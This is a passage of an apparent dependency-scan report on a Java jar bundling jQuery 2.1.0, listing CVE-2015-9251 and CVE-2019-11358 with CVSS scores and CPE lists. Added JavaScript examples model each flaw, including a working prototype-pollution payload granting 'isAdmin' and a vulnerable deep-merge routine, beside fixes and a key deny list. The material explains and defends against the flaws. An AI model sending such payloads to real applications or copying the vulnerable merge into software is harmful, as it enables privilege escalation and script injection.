cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:*
cpe:2.3:a:oracle:health_sciences_inform:6.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hyperion_financial_reporting:11.1.2.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0
cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0
cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:* versions up to (excluding) 2.12.41
cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_resources:9.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2; versions up to (including) 16.2.11
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4
cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:*
cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:*
cpe:2.3:a:oracle:siebel_mobile:*:*:*:*:*:*:*:* versions up to (including) 20.12
cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*
cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9
jquery issue: 162 (RETIREJS)
jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates
Unscored
spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jar: jquery.min.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar/META-INF/resources/webjars/jquery/2.1.0/jquery.min.js
MD5: 1fe1caacda14275805e4c6fb15f2503b
SHA1: 7e40e55d80a93539665009b9772829300701bb32
SHA256: 8851e7844413ec986053d7d497ca932861b8622d2369bb291777329c2a713c72
Evidence
Type      Source  Name     Value   Confidence
Vendor    file    name     jquery  High
Product   file    name     jquery  High
Version   file    version  2.1.0   High
CVE-2015-9251
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
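Why the missing dataType matters, as an added example that is not code from this report or from jQuery: a reduced JavaScript model of how jQuery before 3.0 picked a response converter when $.ajax() was called without dataType, beside the 3.0 prefilter that sets s.contents.script = false for cross-domain requests (jquery/jquery issue 2432) and the caller-side mitigation of always passing an explicit dataType. The names handleResponse, HOSTILE_RESPONSE and the patched flag are this example's own, the response object is constructed inline, and the real library consults a fuller set of content types and converters than the three modelled here.

```javascript
// Added example, not code from this report or from jQuery itself: a reduced
// model of how jQuery < 3.0 chose a response converter when $.ajax() was
// called without dataType, and of the 3.0 prefilter that closed CVE-2015-9251.
// Responses are constructed inline; nothing is fetched over the network.

// The Content-Type tests jQuery uses for its "script" and "json" content types.
const SCRIPT_CONTENT_TYPE = /\b(?:java|ecma)script\b/;
const JSON_CONTENT_TYPE = /\bjson\b/;

// settings: { crossDomain, dataType } as a caller would pass to $.ajax().
// response: { contentType, body } standing in for the XHR result.
// patched:  true models jQuery >= 3.0, where an ajaxPrefilter sets
//           s.contents.script = false for cross-domain requests (gh-2432).
function handleResponse(settings, response, patched) {
  let dataType = settings.dataType;
  if (!dataType) {
    // No explicit dataType: infer one from the server's Content-Type header,
    // which for a cross-origin request the remote server controls.
    const scriptAllowed = !(patched && settings.crossDomain);
    if (scriptAllowed && SCRIPT_CONTENT_TYPE.test(response.contentType)) {
      dataType = "script";
    } else if (JSON_CONTENT_TYPE.test(response.contentType)) {
      dataType = "json";
    } else {
      dataType = "text";
    }
  }
  switch (dataType) {
    case "script":
      // jQuery's "text script" converter hands the body to globalEval.
      return { dataType, executed: true, data: new Function(response.body)() };
    case "json":
      // Parsed, never evaluated; a script body is a SyntaxError here.
      return { dataType, executed: false, data: JSON.parse(response.body) };
    default:
      return { dataType, executed: false, data: response.body };
  }
}

// Constructed cross-origin response: the remote side answers with script.
const HOSTILE_RESPONSE = {
  contentType: "text/javascript; charset=utf-8",
  body: 'return "attacker script executed";',
};

// jQuery < 3.0, no dataType: the body runs in the page's origin.
function vulnerableCall() {
  return handleResponse({ crossDomain: true }, HOSTILE_RESPONSE, false);
}

// jQuery >= 3.0, no dataType: "script" is never inferred cross-domain.
function patchedLibraryCall() {
  return handleResponse({ crossDomain: true }, HOSTILE_RESPONSE, true);
}

// Mitigation while pinned to an old jQuery: always pass an explicit dataType.
function explicitDataTypeCall() {
  try {
    return handleResponse({ crossDomain: true, dataType: "json" }, HOSTILE_RESPONSE, false);
  } catch (err) {
    return { dataType: "json", executed: false, error: err.name };
  }
}

console.log(vulnerableCall(), patchedLibraryCall(), explicitDataTypeCall());
```

The webjar on this page ships jQuery 2.1.0, which predates both the 3.0 change and the 3.5.0 release cited elsewhere in this report, so every cross-origin $.ajax call made against it needs an explicit dataType until the webjar is upgraded.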
CVSSv3:
Base Score: MEDIUM (6.1)
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
(Shown in the raw report as CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A; E:2.8 is not a valid CVSS 3.0 Exploit Code Maturity value, 2.8 being the exploitability subscore for this base vector, so paste only the base vector into a calculator.)
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
info - http://research.insecurelabs.org/jquery/test/
info - https://bugs.jquery.com/ticket/11974
info - https://github.com/advisories/GHSA-rmxg-73gg-4p98
info - https://github.com/jquery/jquery/issues/2432
info - https://nvd.nist.gov/vuln/detail/CVE-2015-9251
Vulnerable Software & Versions (NVD):
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.0.0
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_converged_application_server:*:*:*:*:*:*:*:* versions up to (excluding) 7.0.0.1
cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_services_gatekeeper:*:*:*:*:*:*:*:* versions up to (excluding) 6.1.0.4.0
cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:* versions up to (excluding) 7.2
cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_liquidity_risk_management:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.6
cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6
cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.1; versions up to (including) 17.12
cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:*
cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:*
cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:*
cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:* versions from (including) 4.3.0.1; versions up to (including) 4.3.0.4
cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*
CVE-2019-11358
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
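How the enumerable __proto__ property reaches Object.prototype, as an added example that is not code from this report or from jQuery: a JavaScript deep merge that mirrors the recursion structure of jQuery.extend(true, ...) before 3.4.0, beside the same merge with the __proto__ and self-reference skip that the 3.4.0 commit in the references above introduced, driven by a constructed JSON payload. The names deepExtendVulnerable, deepExtendFixed, hasDangerousKey and PAYLOAD are this example's own, and hasDangerousKey is a caller-side input filter, not something jQuery provides.

```javascript
// Added example, not code from this report or from jQuery itself: a deep
// merge modelled on jQuery.extend(true, ...) as it behaved before 3.4.0,
// beside the check jQuery 3.4.0 added, driven by a constructed JSON payload
// of the kind an attacker would send to an endpoint that merges user input.

function isPlainObject(obj) {
  if (obj === null || typeof obj !== "object") return false;
  const proto = Object.getPrototypeOf(obj);
  // As in jQuery.isPlainObject, a null-prototype object counts as plain,
  // which is exactly why Object.prototype itself passes this test.
  return proto === null || proto === Object.prototype;
}

// Pre-3.4.0 behaviour: every own enumerable key of source is merged,
// "__proto__" included.
function deepExtendVulnerable(target, source) {
  for (const name in source) {
    if (!Object.prototype.hasOwnProperty.call(source, name)) continue;
    const copy = source[name];
    if (isPlainObject(copy)) {
      // For name === "__proto__", target[name] reads Object.prototype, which
      // passes isPlainObject, so the recursion writes into the shared prototype.
      const src = target[name];
      const clone = isPlainObject(src) ? src : {};
      target[name] = deepExtendVulnerable(clone, copy);
    } else if (copy !== undefined) {
      target[name] = copy;
    }
  }
  return target;
}

// 3.4.0 behaviour: skip __proto__ and never merge an object into itself.
function deepExtendFixed(target, source) {
  for (const name in source) {
    if (!Object.prototype.hasOwnProperty.call(source, name)) continue;
    const copy = source[name];
    if (name === "__proto__" || target === copy) continue;
    if (isPlainObject(copy)) {
      const src = target[name];
      const clone = isPlainObject(src) ? src : {};
      target[name] = deepExtendFixed(clone, copy);
    } else if (copy !== undefined) {
      target[name] = copy;
    }
  }
  return target;
}

// Constructed attacker input, e.g. a JSON body merged into default options.
// JSON.parse creates an own, enumerable "__proto__" data property, which is
// what lets the payload reach the merge loop at all.
const PAYLOAD = '{"__proto__": {"isAdmin": true}}';

// Defence in depth for code still on an old jQuery: refuse input that names
// a prototype-walking key anywhere in the tree before merging it.
const DANGEROUS_KEYS = new Set(["__proto__", "constructor", "prototype"]);
function hasDangerousKey(value) {
  if (value === null || typeof value !== "object") return false;
  return Object.keys(value).some(
    (k) => DANGEROUS_KEYS.has(k) || hasDangerousKey(value[k])
  );
}

function runVulnerable() {
  deepExtendVulnerable({}, JSON.parse(PAYLOAD));
  const polluted = ({}).isAdmin === true; // an unrelated, freshly created object
  delete Object.prototype.isAdmin;        // undo the global side effect
  return polluted;
}

function runFixed() {
  const out = deepExtendFixed({}, JSON.parse(PAYLOAD));
  const polluted = ({}).isAdmin === true;
  delete Object.prototype.isAdmin;
  return { polluted, ownKeys: Object.keys(out) };
}

console.log(runVulnerable(), runFixed(), hasDangerousKey(JSON.parse(PAYLOAD)));
```

The vulnerable merge leaves isAdmin readable on every object in the realm, including ones created after the merge, which is why a single polluted request can flip authorisation checks elsewhere in the application; the fixed merge drops the key entirely, and the input filter rejects the payload before any merge runs.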
CVSSv3:
Base Score: MEDIUM (6.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
(Shown in the raw report as CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A; E:2.8 is not a valid CVSS 3.1 Exploit Code Maturity value, 2.8 being the exploitability subscore for this base vector, so paste only the base vector into a calculator.)
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/
info - https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b
info - https://nvd.nist.gov/vuln/detail/CVE-2019-11358
Vulnerable Software & Versions (NVD):
cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.11.0; versions up to (excluding) 1.11.9
cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.12.0; versions up to (excluding) 1.12.6
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.66
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.5.0; versions up to (excluding) 8.5.15
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (excluding) 8.6.15
cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* versions from (including) 3.0.0; versions up to (including) 3.9.4
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0
cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3
cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*
cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 19.1
cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0
cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0
cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0
cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.0; versions up to (including) 6.4
cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3
cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.1.0
cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.8
cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9
cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7
cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*
